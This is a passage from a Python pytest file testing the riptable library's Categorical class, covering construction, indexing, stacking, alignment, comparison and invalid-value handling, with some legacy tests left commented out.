Categorical(['a', 'a', 'b', 'c', 'a'], ['a', 'b', 'c'], base_index=0) assert c.base_index == 0, 'Did not force base index to 0' assert c._fa[0] == 0, 'Did not force base index to 0' with pytest.raises(NotImplementedError): c = Categorical(['a', 'a', 'b', 'c', 'a'], ['a', 'b', 'c'], base_index=0, filter=filter) with pytest.raises(ValueError): c = Categorical([1.0, 2.0, 3.0], ['a', 'b', 'c'], from_matlab=True, base_index=0) pdc = pd.Categorical(['a', 'a', 'b', 'c', 'a']) with pytest.raises(ValueError): c = Categorical(pdc, base_index=0) def test_is_in_unique_strings(self): values = ['a', 'b', 'c', 'c', 'd', 'a', 'b'] good_cats = ['a', 'b', 'c', 'd'] incomplete_cats = ['a', 'b', 'c'] bad_cats = ['a', 'a', 'b'] invalid = 'invalid' ###--------REMOVED from_provided_categories, rewrite these tests to go through main constructor # valid bytes c = Categorical(values, good_cats, ordered=True, base_index=1, unicode=False, filter=None) cats = c._categories_wrap assert len(c) == 7 assert max(c._fa) == 4 assert cats._mode == CategoryMode.StringArray assert cats._list.dtype.char == 'S' assert cats.isbytes # valid unicode c = Categorical(values, good_cats, ordered=True, base_index=1, unicode=True, filter=None) cats = c._categories_wrap assert len(c) == 7 assert max(c._fa) == 4 assert cats._mode == CategoryMode.StringArray assert cats._list.dtype.char == 'U' assert cats.isunicode # non-unique categories # 4/12/2019 - no longer checks for uniqueness # with self.assertRaises(ValueError): # c = Categories.from_provided_categories(values, bad_cats, ordered=True, base_index=1, unicode=False, filter=None) # not all values found in categories with pytest.raises(ValueError): c = Categorical(values, incomplete_cats, ordered=True, base_index=1, unicode=False, filter=None,) # insert invalid True # 5/16/2019 invalid must appear in provided uniques with pytest.raises(ValueError): c = Categorical( values, incomplete_cats, ordered=True, base_index=1, unicode=True, filter=None, invalid=invalid, ) cats = c._categories_wrap assert len(c) == 7 assert max(c._fa) == 3 assert cats._mode == CategoryMode.StringArray assert cats._list.dtype.char == 'U' assert cats.isunicode def test_getitem_enum_str(self): codes = [1, 44, 44, 133, 75] correct = [True, False, False, False, False] valid_str = 'StronglyDisagree' invalid_str = 'q' c = Categorical(codes, LikertDecision) # with self.assertRaises(IndexError): mask = c[valid_str] is_correct = bool(np.all(mask == correct)) assert is_correct with pytest.raises(ValueError): mask = c[invalid_str] assert sum(mask) == 0 def test_match_str_to_category(self): single_byte = b'a' single_unicode = 'a' single_true_unicode = u'\u2082' byte_values = [b'a', b'b', b'c', b'c', b'd', b'a', b'b'] values = FastArray(['a', 'b', 'c', 'c', 'd', 'a', 'b']) true_unicode = [u'\u2082', u'\u2083', u'\u2082'] # 4/25/2019 - changed these tests to construct a Categorical, rather than # a Categories object directly. Categorical will always make a Categories object. # (held in _categories_wrap) c = Categorical(values, ordered=True, base_index=1, filter=None) matching_char = c._categories_wrap.match_str_to_category(single_unicode) assert isinstance(matching_char, bytes) with pytest.raises(TypeError): matching = c._categories_wrap.match_str_to_category(single_true_unicode) univals = np.array(['a', 'b', 'c', 'c', 'd', 'a', 'b']) c = Categorical(univals, ordered=True, base_index=1, filter=None, unicode=True) matching_char = c._categories_wrap.match_str_to_category(single_byte) assert isinstance(matching_char, str) c = Categorical(values, ordered=True, base_index=1, filter=None) matching = c._categories_wrap.match_str_to_category(values) assert matching.dtype.char == 'S' with pytest.raises(TypeError): matching = c._categories_wrap.match_str_to_category(true_unicode) c = Categorical(univals, ordered=True, base_index=1, filter=None, unicode=True) matching = c._categories_wrap.match_str_to_category(values) assert matching.dtype.char == 'U' # Categories object being removed # Disabling these tests - methods will move into Categorical # 4/24/2019 # def test_get_category_index(self): # values = FastArray(['a', 'b', 'c', 'c', 'd', 'a', 'b', 'g']) # _, c, _, _ = Categories.from_array(values, ordered=True, base_index=1, filter=None) # # when found, will return exact index # str_idx = c.get_category_index('b') # self.assertEqual(str_idx, 2) # # when ordered, will return floating point for LTE GTE # str_idx = c.get_category_index('e') # self.assertEqual(str_idx, 4.5) # # when unordered, will return invalid index (length of string array) # c._sorted = False # str_idx = c.get_category_index('e') # self.assertEqual(str_idx, 6) # def test_get_category_match_index(self): # values = FastArray(['a', 'b', 'c', 'c', 'd', 'a', 'b', 'g']) # _, c, _, _ = Categories.from_array(values, ordered=False, base_index=1, filter=None) # string_matches = c.get_category_match_index(['a','b']) # self.assertEqual(string_matches, [1,2]) # c._mode = CategoryMode.IntEnum # with self.assertRaises(NotImplementedError): # string_matches = c.get_category_match_index(['a','b']) def test_possibly_invalid(self): values = ['a', 'b', 'c', 'c', 'd', 'a', 'b', 'g'] c = Categorical(values, base_index=1) out_of_range = -50 sentinel = INVALID_DICT[c.dtype.num] c.view(FastArray)[0] = out_of_range # c.view(FastArray)[1] = sentinel # **changed invalid, all will display as bad code if changed underneath and not in range assert c[0] == "!<-50>" # self.assertEqual(c[1], "!<inv>") def test_categories_getitem_str_list(self): codes = [1, 44, 44, 133, 75] correct = FastArray([False, True, True, False, True]) c = Categorical(codes, LikertDecision) mask = c[['StronglyAgree', 'Disagree']] is_correct = bool(np.all(mask == correct)) assert is_correct mask = c[[b'StronglyAgree', b'Disagree']] is_correct = bool(np.all(mask == correct)) assert is_correct def test_categories_print_repr(self): self._notimpl() def test_enum_dict_warning(self): class DupeEnum(IntEnum): code_a = 1 code_b = 1 code_c = 1 code_d = 2 with pytest.warns(UserWarning): c = Categorical([1, 2], DupeEnum) # ------------------------- TEST MERGE ------------------------------------------- # def test_merge(self): # from riptable.rt_categorical import categorical_merge # c_bytes = Categorical(['b','b','b','a','b','b'], ['a','b']) # c_unicode = Categorical(["AAPL\u2080","AMZN\u2082"]) # result = categorical_merge([c_bytes, c_unicode]) # # self.assertTrue(result[0]._categories_wrap._list is result[1]._categories_wrap._list, msg=f"Categorical merge did not assign the same dictionary to both arrays.") # self.assertEqual(result[0]._categories_wrap._list.dtype.char, 'U', msg=f"{result[0]._categories_wrap._list.dtype.char} was not 'U'. dictionary was not flipped to unicode.") # for item in c_bytes._categories_wrap._list: # self.assertTrue(item.decode() in result[0]._categories_wrap._list, msg=f"{item} did not appear in final categories") # for item in c_unicode._categories_wrap._list: # self.assertTrue(item in result[0]._categories_wrap._list, msg=f"{item} did not appear in final categories") # c1 = Categorical([1, 1, 3, 2, 2], [1, 2, 3, 4, 5], from_matlab=True) # c2 = Categorical([2, 2, 4, 4, 3], [1, 2, 3, 4, 5], from_matlab=True) # [cm1, cm2] = categorical_merge([c1, c2]) # self.assertTrue((cm1 == [1, 1, 3, 2, 2]).all()) # self.assertTrue((cm2 == [2, 2, 4, 4, 3]).all()) # ------------------------- TEST HSTACK ------------------------------------------- def test_hstack(self): c1 = Categorical(['a', 'a', 'c', 'b', 'b']) c2 = Categorical(['b', 'b', 'd', 'd', 'c']) cm = Categorical.hstack([c1, c2]) assert (cm.as_string_array == ['a', 'a', 'c', 'b', 'b', 'b', 'b', 'd', 'd', 'c']).all() c1 = Categorical([1, 1, 3, 2, 2], [1, 2, 3, 4, 5], from_matlab=True) c2 = Categorical([2, 2, 4, 4, 3], [1, 2, 3, 4, 5], from_matlab=True) cm = Categorical.hstack([c1, c2]) assert (cm == [1, 1, 3, 2, 2, 2, 2, 4, 4, 3]).all() def test_hstack_fails_for_different_mode_cats(self): # Create a dictionary-mode Categorical (from ISO3166 data). # The dictionary is created manually below instead of using e.g. # {k: int(v) for (k, v) in ISOCountryCode.__members__.items()} # so the dictionary we give to Categorical does not have the insert ordering # imply an ordering of the keys/values. country_code_dict = { 'IRL': 372, 'USA': 840, 'AUS': 36, 'HKG': 344, 'JPN': 392, 'MEX': 484, 'KHM': 116, 'THA': 764, 'JAM': 388, 'ARM': 51 } # The values for the Categorical's backing array. # This includes some value(s) not in the dictionary and not all values in the dictionary are used here. country_num_codes = [36, 36, 344, 840, 840, 372, 840, 372, 840, 124, 840, 124, 36, 484] cat1 = rt.Categorical(country_num_codes, country_code_dict) assert cat1.category_mode == CategoryMode.Dictionary # Create a single-key, string-mode Categorical. cat2 = rt.Categorical(['AUS', 'AUS', 'HKG', 'USA', 'USA', 'IRL', 'USA', 'IRL', 'USA', 'KHM', 'IRL', 'AUS', 'MEX']) assert cat2.category_mode != CategoryMode.Dictionary # Try to hstack the two Categoricals. This should fail due to the CategoryMode values being different. with pytest.raises((ValueError, TypeError)): rt.hstack([cat1, cat2]) def test_align(self): c1 = Categorical(['a', 'b', 'c']) c2 = Categorical(['d', 'e', 'f']) c3 = Categorical(['c', 'f', 'z']) cm = Categorical.align([c1, c2, c3]) assert (cm[0].as_string_array == ['a', 'b', 'c']).all() assert (cm[1].as_string_array == ['d', 'e', 'f']).all() assert (cm[2].as_string_array == ['c', 'f', 'z']).all() assert (cm[0].categories() == FastArray([b'Filtered', b'a', b'b', b'c', b'd', b'e', b'f', b'z'])).all() assert (cm[0].categories() == cm[1].categories()).all() assert (cm[0].categories() == cm[2].categories()).all() c1 = Categorical([1, 1, 3, 2, 2], [1, 2, 3, 4, 5], from_matlab=True) c2 = Categorical([2, 2, 4, 4, 3], [1, 2, 3, 4, 5], from_matlab=True) cm = Categorical.align([c1, c2]) assert (cm[0] == [1, 1, 3, 2, 2]).all() assert (cm[1] == [2, 2, 4, 4, 3]).all() # Multikey with nested Categorical c1 = Categorical([Categorical(['a']), FastArray([1])]) c2 = Categorical([Categorical(['b']), FastArray([2])]) cm = Categorical.align([c1, c2]) assert cm[0][0] == ('a', 1) assert cm[1][0] == ('b', 2) assert cm[0].category_dict == cm[1].category_dict def test_categorical_merge_dict(self): from riptable.rt_categorical import categorical_merge_dict d1 = {'a': 1, 'b': 2, 'c': 3, 'd': 4, 'e': 5} d2 = {'a': 1, 'e': 5, 'b': 2, 'f': 6} c1 = Categorical([3, 3, 4, 3, 1, 2, 5], d1) c2 = Categorical([1, 1, 5, 2, 2, 1, 5], d2) combined = categorical_merge_dict([c1, c2], return_type=dict) for i in range(1, 6): assert i in combined.values() def test_getitem_empty(self): c = Categorical([0, 1, 2], ['a', 'b', 'c']) empty_list = c[[]] assert isinstance(empty_list, Categorical) dict_matches = bool(np.all(empty_list.categories() == c.categories())) assert dict_matches with pytest.raises(IndexError): empty_np = c[np.array([])] assert isinstance(empty_np, Categorical) dict_matches = bool(np.all(empty_np.categories() == c.categories())) assert dict_matches def test_iter_groups(self): correct_keys = FastArray(['a', 'b', 'c', 'd', 'e']) correct_idx = [[8], [3], [5, 6], [2, 9], [0, 1, 4, 7]] str_arr = FastArray(['e', 'e', 'd', 'b', 'e', 'c', 'c', 'e', 'a', 'd']) c = Categorical(str_arr) for i, tup in enumerate(c.iter_groups()): assert tup[0] == correct_keys[i] assert bool(np.all(tup[1] == correct_idx[i])) def test_enum_dict_multi(self): self._notimpl() # not implemented def test_enum_init_errors(self): with pytest.raises(TypeError): c = Categorical(['a', 'b', 'c'], LikertDecision) def test_custom_invalid_category(self): # 5/16/2019 invalid must appear in provided uniques c = Categorical( ['a', 'b', 'c', 'my_invalid'], ['a', 'b', 'c', 'my_invalid'], invalid='my_invalid', base_index=1, ) assert c[3] == 'my_invalid' assert c.isnan()[3] assert len(c.category_array) == 4 @pytest.mark.xfail(reason="After invalid_set, the custom invalid value is not displayed.") def test_invalid_set(self): c = Categorical( ['a', 'b', 'c', 'my_invalid'], ['a', 'b', 'c', 'my_invalid'], invalid='my_invalid', base_index=1, ) # set a new string to be displayed for invalid items and validate custom_invalid = "custom_invalid" c.invalid_set(custom_invalid) assert c[3] == custom_invalid assert c.isnan()[3] assert len(c.category_array) == 4 def test_lock_unlock(self): self._notimpl() # halfway implemented def test_set_item(self): self._notimpl() # when index needs to be fixed after categories are added # setitem with integer / invalid integer # setitem with string / invalid category def test_return_empty_cat(self): self._notimpl() # this code still needs to get written def test_getitem_np_str(self): c = Categorical(['a', 'a', 'b', 'a', 'c', 'c', 'b']) correct = FastArray([True, True, True, True, False, False, True]) with pytest.raises(IndexError): result = c[np.array(['a', 'b'])] # self.assertTrue(array_equal(result, correct), msg=f"incorrect getitem result when indexing by numpy array of strings") with pytest.raises(IndexError): result = c[np.array(['a', 'b']).astype('S')] # self.assertTrue(array_equal(result, correct), msg=f"incorrect getitem result when indexing by numpy array of strings") def test_getitem_slice(self): c = Categorical(['a', 'a', 'b', 'a', 'c', 'c', 'b']) result = c[:3] assert isinstance(result, Categorical) match_fa = bool(np.all(result.view(FastArray) == [1, 1, 2])) assert match_fa assert len(result) == 3 assert len(result._categories_wrap) == 3 def test_categorical_compare_check(self): self._notimpl() # Categories have different modes # categories are both enum # compare cat to empty list # non-categorical input # convert all to unicode if one is unicode # this keyword wasn't used anywhere, removed from copy() # def test_copy_invalid(self): # c = Categorical(['a','a','b','a','c','c','b']) # invalid_copy = c.copy(fill_invalid=True) # all_invalid = bool(np.all(invalid_copy.view(FastArray)==-128)) # self.assertTrue(all_invalid) # for idx, item in enumerate(c.categories()): # self.assertEqual(item, invalid_copy.categories()[idx]) # self.assertFalse(c.categories() is invalid_copy.categories()) def test_fill_invalid(self): values = list('aabaccb') c = Categorical(values, base_index=1) c.fill_invalid(inplace=True) assert_array_equal(FastArray([c.filtered_name] * len(values)), c.expand_array) assert_array_equal(FastArray([0] * len(values)), c._fa) expected = FastArray(sorted(set(values))).astype('|S1') assert_array_equal(expected, c.category_array) assert_array_equal(expected, c.category_dict[next(iter(c.category_dict))]) # values of first key def test_force_unicode(self): c = Categorical(['a', 'a', 'b', 'a', 'c', 'c', 'b'], unicode=True) result_dtype = c.categories().dtype.char assert result_dtype == 'U', f"Failed to force unicode when constructing categorical from list of string values" def test_categories_shallow_copy(self): codes = [10, 10, 20, 10, 30, 20, 10] d = {10: 'a', 20: 'b', 30: 'c'} c = Categorical(codes, d) original_cats = c._categories_wrap new_cats = original_cats.copy(deep=False) assert ( original_cats._str_to_int_dict is new_cats._str_to_int_dict ), f"Categories did not use same str_to_int dictionary after shallow copy." assert ( original_cats._int_to_str_dict is new_cats._int_to_str_dict ), f"Categories did not use same int_to_str dictionary after shallow copy." # 5/16/2019 invalid category must be in user provided # def test_two_lists_invalid(self): # c = Categorical(['a','a','b','a','c','c','b'],np.array(['a','b']), invalid='inv', base_index=1) # self.assertEqual(c[4],FILTERED_LONG_NAME) @pytest.mark.xfail( reason='20200416 This test was previously overridden by a later test in the file with the same name. Need to revisit and get back in a working state.' ) def test_getitem_enum_list(self): c = Categorical([44, 133, 133, 75, 144, 1], LikertDecision) with pytest.raises(IndexError): result = c[[b'NeitherAgreeNorDisagree']] correct = FastArray([False, False, False, False, True, False]) # self.assertTrue(array_equal(result, correct)) result = c[[4]] assert result[0] == 'NeitherAgreeNorDisagree' def test_non_unique(self): with pytest.raises(ValueError): c = Categorical(['a', 'a', 'b', 'a', 'c', 'c', 'b'], ['a', 'a', 'b']) def test_match_to_category(self): c = Categorical(['a', 'a', 'b', 'a', 'c', 'c', 'b']) result = c._categories_wrap.match_str_to_category('a') assert b'a' == result with pytest.raises(TypeError): result = c._categories_wrap.match_str_to_category([1, 2, 3]) with pytest.raises(TypeError): result = c._categories_wrap.match_str_to_category({1, 2, 3}) c1 = Categorical(['abc', 'def', 'abc', 'abc'], np.array(['abc', 'def']), unicode=True) result = c1._categories_wrap.match_str_to_category([b'a']) assert result.dtype.char == 'U' # ------------------------------------TEST SET ITEM------------------------------------------ def test_set_item_str_index(self): c = Categorical(['b', 'b', 'b', 'a', 'b', 'b'], ['a', 'b']) correct = [2, 2, 2, 2, 2, 2] c['a'] = 'b' is_correct = bool(np.all(c.view(FastArray) == correct)) assert is_correct, f"Category was not correctly changed with set item on a string." with pytest.raises(ValueError): c['b'] = 'c' def test_set_item_int_index(self): c = Categorical(['b', 'b', 'b', 'a', 'b', 'b'], ['a', 'b']) correct = [1, 2, 2, 1, 2, 2] c[0] = 'a' is_correct = bool(np.all(c.view(FastArray) == correct)) assert is_correct, f"Category was not correctly changed with set item on an int." with pytest.raises(ValueError): c[0] = 'c' # ------------------------------------TEST CALCULATE DTYPE ---------------------------------- def test_get_dtype_from_len(self): ''' Categorical will select different types ''' dtype_sizes = { np.int8: 1, np.int16: 101, np.int32: 50001, } # , np.int64:2000000001 } for dt, sz in dtype_sizes.items(): LENGTH = 6 NO_CODES = sz alphabet = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') np_alphabet = np.array(alphabet, dtype="|U1") np_codes = np.random.choice(np_alphabet, [NO_CODES, LENGTH]) codes = ["".join(np_codes[i]) for i in range(len(np_codes))] c = Categorical(["".join(np_codes[i]) for i in range(len(np_codes))]) # only perform the test if there are enough uniques if len(c._categories_wrap._list) >= sz: assert c.dtype == dt, f"Categorical did not set dtype to {dt} for array of size {sz}." # -------SINGLE INTEGER def test_getitem_int(self): ''' Single integer index should return the corresponding category in unicode format. ''' c = Categorical(['b', 'b', 'b', 'a', 'b', 'b'], ['a', 'b']) assert c[0] == 'b', f"Get item with integer did not return the correct category." assert isinstance(c[0], str), f"Get item with integer did not return as unicode." assert c[3] == 'a', f"Get item with integer did not return the correct category." assert isinstance(c[3], str), f"Get item with integer did not return as unicode." with pytest.raises(IndexError): d = c[10] # --------INTEGER MASK def test_getitem_int_mask(self): py_mask = [0, 3] c = Categorical(['b', 'b', 'b', 'a', 'b', 'b'], ['a', 'b']) for mask in [py_mask, np.array(py_mask)]: d = c[mask] assert isinstance( d, Categorical ), f"Get item with integer mask did not return a categorical. Returned {type(d).__name__} instead." assert len(d) == len( mask ), f"Get item with integer mask did not return categorical of {len(mask)}. returned {len(d)} instead." has_same_cats = bool(np.all(d._categories_wrap._list == c._categories_wrap._list)) assert ( has_same_cats ), f"Failed to copy the same categories to new categorical after getitem with integer mask." d = c[[0, 10]] assert d._fa[1] == 0, f"Failed to put invalid for out of range index." # -------BOOLEAN MASK def test_getitem_bool_mask(self): py_mask = [True, True, True, False, True, True] c = Categorical(['b', 'b', 'b', 'a', 'b', 'b'], ['a', 'b']) for mask in [py_mask, np.array(py_mask)]: d = c[mask] assert not ( b'a' in d.as_string_array ), f"b'a' does not get trimmed out of categorical with getitem from boolean array." assert 5 == len( d ), f"Length {len(d)} did not match 5 in categorical getitem with a boolean array of the same size." has_same_cats = bool(np.all(d._categories_wrap._list == c._categories_wrap._list)) assert ( has_same_cats ), f"Failed to copy the same categories to new categorical after getitem with integer mask." # -------SINGLE STRING def test_getitem_single_string(self): b_result = [True, True, True, False, True, True] c = Categorical(['b', 'b', 'b', 'a', 'b', 'b'], ['a', 'b']) idx = b'c' # with self.assertRaises(IndexError): d = c[idx] has_true = bool(np.any(d)) assert not has_true, f"Failed to return an array of all false for getitem with {idx}" assert isinstance(d, FastArray), f"Get item input {idx} did not return FastArray" assert d.dtype.char == '?', f"Get item input {idx} did not return FastArray" idx = idx.decode() # with self.assertRaises(IndexError): d = c[idx] has_true = bool(np.any(d)) assert not has_true, f"Failed to return an array of all false for getitem with {idx}" assert isinstance(d, FastArray), f"Get item input {idx} did not return FastArray" assert d.dtype.char == '?', f"Get item input {idx} did not return FastArray" idx = b'b' # with self.assertRaises(IndexError): d = c[idx] is_correct = bool(np.all(d == b_result)) assert is_correct, f"Did not return the correct array for getitem with {idx}" assert isinstance(d, FastArray), f"Get item input {idx} did not return FastArray" assert d.dtype.char == '?', f"Get item input {idx} did not return FastArray" idx = idx.decode() # with self.assertRaises(IndexError): d = c[idx] is_correct = bool(np.all(d == b_result)) assert is_correct, f"Did not return the correct array for getitem with {idx}" assert isinstance(d, FastArray), f"Get item input {idx} did not return FastArray" assert d.dtype.char == '?', f"Get item input {idx} did not return FastArray" # ------MULTIPLE STRINGS def test_getitem_multiple_strings(self): c = Categorical(['b', 'b', 'b', 'a', 'b', 'b']) inputs = { (b'b',): [True, True, True, False, True, True], # single in (list) (b'c',): [False, False, False, False, False, False], # single not in (list) (b'a', b'b'): [True, True, True, True, True, True], # both in (list) (b'c', b'd'): [False, False, False, False, False, False,], # both not in (list) (b'b', b'c'): [True, True, True, False, True, True], # mixed (list) } for idx, correct in inputs.items(): idx = list(idx) d = c[idx] is_correct = bool(np.all(d == correct)) assert is_correct, f"Indexing categorical {c} by {idx} did not return the correct result." assert d.dtype.char == '?', f"Get item input {idx} did not return FastArray" idx = [b.decode() for b in idx] d = c[idx] is_correct = bool(np.all(d == correct)) assert is_correct, f"Indexing categorical {c} by {idx} did not return the correct result." assert d.dtype.char == '?', f"Get item input {idx} did not return FastArray" # ------NUMERIC GETITEM def test_getitem_numeric_categories(self): # before it was fixed, a bug was returning a string of the numeric category nums = np.array([1, 1, 2, 3, 4, 5, 1, 1, 1]) c = Categorical(nums) assert c[0] == 1 assert isinstance(c[0], (int, np.integer)) nums = nums.astype(np.float32) c = Categorical(nums) assert c[0] == 1.0 assert isinstance(c[0], (float, np.floating)), f"Expected float, got {type(c[0])}" # ------------------------- TEST COMPARE CHECK ------------------------------------------- def test_compare_check(self): ''' Test comparison between two 'equal' categoricals with different underlying arrays. ''' compare_ops = { '__ne__': [False, False, False, False, False, False], '__eq__': [True, True, True, True, True, True], '__ge__': [True, True, True, True, True, True], '__gt__': [False, False, False, False, False, False], '__le__': [True, True, True, True, True, True], '__lt__': [False, False, False, False, False, False], } c = Categorical(['b', 'b', 'b', 'a', 'b', 'b'], ['a', 'b', 'c']) d = Categorical(['b', 'b', 'b', 'a', 'b', 'b'], ['a', 'b']) for name, correct in compare_ops.items(): func = c.__getattribute__(name) result = func(d) is_correct = bool(np.all(result == correct)) assert is_correct, f"Compare operation betweeen two equal categoricals did not return the correct result." def test_compare_return_type(self): ''' Test comparison operations with single strings to make sure FastArray of boolean is returned. ''' c = Categorical(['b', 'b', 'b', 'a', 'b', 'b'], ['a', 'b']) scalars = ['a', 'c'] compare_ops = ['__ne__', '__eq__', '__ge__', '__gt__', '__le__', '__lt__'] for s in scalars: for op in compare_ops: func = c.__getattribute__(op) result = func(s) assert isinstance(result, FastArray), f"comparison {op} with input {s} did not return FastArray" assert result.dtype.char == '?', f"comparison {op} with input {s} did not return boolean" def test_compare_different_modes(self): c1 = Categorical(['b', 'b', 'b', 'a', 'b', 'b'], ['a', 'b']) c2 = Categorical([0, 1], {0: 'a', 1: 'b'}) with pytest.raises(TypeError): c1 == c2 def test_compare_conflicting_dicts(self): c1 = Categorical([0, 1], {0: 'a', 1: 'b'}) c2 = Categorical([0, 1], {1: 'a', 0: 'b'}) with pytest.raises(ValueError): c1 == c2 def test_compare_safe_dicts(self): c1 = Categorical([0, 1], {0: 'a', 1: 'b'}) c2 = Categorical([2, 1], {2: 'c', 1: 'b'}) correct = FastArray([False, True]) result = c1 == c2 match = bool(np.all(correct == result)) assert match def test_isnan(self): c = Categorical([1, 1, 3, 2, 2], ['a', 'b', 'c'], base_index=1, invalid='a') is_correct = [True, True, False, False, False] is_not_correct = [False, False, True, True, True] assert bool(np.all(is_correct == isnan(c))) assert bool(np.all(is_correct == c.isnan())) assert bool(np.all(is_not_correct == isnotnan(c))) assert bool(np.all(is_not_correct == c.isnotnan())) # ------------------------------------------------------ def test_get_categories(self): # string list c = Categorical(['a', 'b', 'c', 'd', 'e']) catsarray = c.category_array assert isinstance(catsarray, np.ndarray) catsdict = c.category_dict assert isinstance(catsdict, dict) assert len(catsdict) == 1 with pytest.raises(TypeError): catscodes = c.category_codes with pytest.raises(TypeError): catsmapping = c.category_mapping # numeric list c = Categorical(np.array([1, 2, 3, 4, 5])) catsarray = c.category_array assert isinstance(catsarray, np.ndarray) catsdict = c.category_dict assert isinstance(catsdict, dict) assert len(catsdict) == 1 with pytest.raises(TypeError): catscodes = c.category_codes with pytest.raises(TypeError): catsmapping = c.category_mapping # dict/enum c = Categorical([1, 2, 3, 4], {1: 'a', 2: 'b', 3: 'c', 4: 'd'}) catsarray = c.category_array assert isinstance(catsarray, np.ndarray) catsdict = c.category_dict assert isinstance(catsdict, dict) assert len(catsdict) == 1 catscodes = c.category_codes assert isinstance(catscodes, np.ndarray) catsmapping = c.category_mapping assert isinstance(catsmapping, dict) # multikey c = Categorical([np.arange(5), np.random.rand(5)]) with pytest.raises(TypeError): catsarray = c.category_array catsdict = c.category_dict assert isinstance(catsdict, dict) assert len(catsdict), 2 with pytest.raises(TypeError): catscodes = c.category_codes with pytest.raises(TypeError): catsmapping = c.category_mapping # ------------------------------------------------------ def test_force_base_index2(self): c = Categorical(['a', 'a', 'b', 'c', 'a']) assert c.base_index == 1 assert c._fa[0] == 1 c = Categorical(['a', 'a', 'b', 'c', 'a'], base_index=0) assert c.base_index == 0 assert c._fa[0] == 0 codes = np.array([0, 0, 1, 2, 0]) cats = np.array(['a', 'b', 'c']) # c = Categorical(codes, cats) # self.assertEqual(c.base_index, 0) # self.assertEqual(c._fa[0], 0) codes += 1 c = Categorical(codes, cats, base_index=1) assert c.base_index == 1 assert c._fa[0] == 1 codes = codes.astype(np.float32) c = Categorical(codes, cats, from_matlab=True) assert c.base_index == 1 assert c._fa[0] == 1 with pytest.raises(ValueError): c = Categorical(codes, cats, from_matlab=True, base_index=0) c = Categorical(np.array(['a', 'a', 'b', 'c', 'a']), np.array(['a', 'b', 'c'])) assert c.base_index == 1 assert c._fa[0] == 1 c = Categorical(np.array(['a', 'a', 'b', 'c', 'a']), np.array(['a', 'b', 'c']), base_index=0) assert c.base_index == 0 assert c._fa[0] == 0 # ------------------------------------------------------ def test_ordered(self): c = Categorical(['c', 'c', 'a', 'b', 'c']) cats = c.category_array assert cats[0] == b'a' c = Categorical(['c', 'c', 'a', 'b', 'c'], ordered=False) cats = c.category_array assert cats[0] == b'c' c = Categorical(['c', 'c', 'a', 'b', 'c'], ['c', 'a', 'b']) cats = c.category_array assert cats[0] == b'c' assert not c.ordered c = Categorical(['c', 'c', 'a', 'b', 'c'], ['a', 'b', 'c']) assert c.ordered ## removed this test - side-effect of search sorted with unsorted array (not categorical related) ## false claim that categories are ordered in keyword # c = Categorical(['c','c','a','c','c'], ['c','a','b'], ordered=True) # self.assertTrue(bool(np.all(c!='c'))) # self.assertTrue(bool(np.all(c!=b'c'))) c = Categorical(['c', 'c', 'a', 'b', 'c'], ['c', 'a', 'b'], ordered=False) cats = c.category_array assert cats[0] == b'c' assert not c.ordered codes = FastArray([0, 0, 1, 2, 0]) cats = FastArray(['c', 'b', 'a'], unicode=True) c = Categorical(codes, cats) assert c.category_array[0] == 'c' assert not c.ordered # with self.assertWarns(UserWarning): # c = Categorical(codes, cats, ordered=True) # self.assertEqual(c.category_array[0], b'c') # self.assertFalse(c.ordered) # ------------------------------------------------------ def test_keywords_not_allowed(self): # filter + base index 0 f = np.array([True, False, True]) with pytest.raises(ValueError): c = Categorical(['a', 'b', 'c'], filter=f, base_index=0) # ------------------------------------------------------ def test_display_properties(self): ''' Categoricals take over their display properties to appear like strings (not the underlying integer array) (see Utils.rt_display_properties) ''' c = Categorical(['b', 'b', 'b', 'a', 'b', 'b'], ['a', 'b']) item_format, convert_func = c.display_query_properties() assert item_format.length == DisplayLength.Long, f"Incorrect length for item format." assert item_format.justification == DisplayJustification.Left assert item_format.invalid == None assert item_format.can_have_spaces == True assert item_format.decoration == None assert item_format.color == DisplayColumnColors.Default assert convert_func.__name__ == 'display_convert_func' # this could change, right now the convert function just does a str over the item assert convert_func(1, item_format) == '1', f"Incorrect convert function was returned." # ------------------------------------------------------ # -----MISC. COVER TESTS-------------------------------- def test_non_array_dict_categories_ctor(self): with pytest.raises(TypeError): c = Categories(['garbage', 'list']) def test_too_many_args_categories_ctor(self): with pytest.raises(ValueError): c = Categories(FastArray([1]), FastArray([2]), FastArray([3])) def test_filter_and_invalid(self): c = Categorical( ['a', 'a', 'b', 'c', 'c'], ['c'], invalid='a', filter=FastArray([True, True, False, True, True]), ) c.filtered_set_name('a') assert bool(np.all(c._fa == [0, 0, 0, 1, 1])) for i in range(3): assert c[i] == 'a' for i in range(3, 5): assert c[i] == 'c' def test_zero_base_with_invalid(self): with pytest.raises(ValueError): c = Categorical(['a', 'b', 'c'], ['b', 'c'], base_index=0) # removed this property from Categories 04/24/2019 # def test_multikey_labels(self): # c = Categorical([FastArray(['a','b','c']), FastArray([1,2,3])]) # labels = c._categories_wrap.multikey_labels # self.assertTrue(isinstance(labels[0], tuple)) # self.assertEqual(labels[0][0],'a') def test_ncols_non_multikey(self): c = Categorical(['a', 'b', 'c']) assert c._categories_wrap.ncols == 1 # now checks for single / multikey / enum, not CategoryMode # def test_len_undefined_mode(self): # c = Categorical(['a','b','c']) # c._categories_wrap._mode = CategoryMode.Default # self.assertEqual(len(c._categories_wrap),0) def test_categories_copy_shallow(self): c = Categorical(['a', 'b', 'c']) copycat = c._categories_wrap.copy(deep=False) assert isinstance(copycat, Categories) def test_categories_copy_deep(self): c = Categorical([1, 2, 3], {1: 'a', 2: 'b', 3: 'c'}) copycat = c._categories_wrap.copy(deep=False) assert isinstance(copycat, Categories) # impossible path, unless mode is forced like below. disabling 4/24/2019 # c._categories_wrap._mode = CategoryMode.Default # with self.assertRaises(NotImplementedError): # c = c._categories_wrap.copy() def test_wrap_get_categories(self): c = Categorical(['a', 'b', 'c']) arr = c._categories_wrap.get_categories() assert isinstance(arr, FastArray) c = Categorical([FastArray(['a', 'b', 'c']), FastArray([1, 2, 3])]) d = c._categories_wrap.get_categories() assert isinstance(d, dict) def test_get_string_mode_nums(self): c = Categorical(np.arange(5)) assert not c._categories_wrap.isbytes assert not c._categories_wrap.isunicode def test_pop_single_arr(self): c = Categorical([np.array(['a', 'b', 'c'])]) d = Categorical(np.array(['a', 'b', 'c'])) assert bool(np.all(c == d)) c = Categorical({'test': np.array(['a', 'b', 'c'])}) d = Categorical(np.array(['a', 'b', 'c'])) assert bool(np.all(c == d)) def test_from_cat_as_array(self): c = Categorical(FastArray([1, 2, 3]), _from_categorical=np.array(['a', 'b', 'c'])) assert 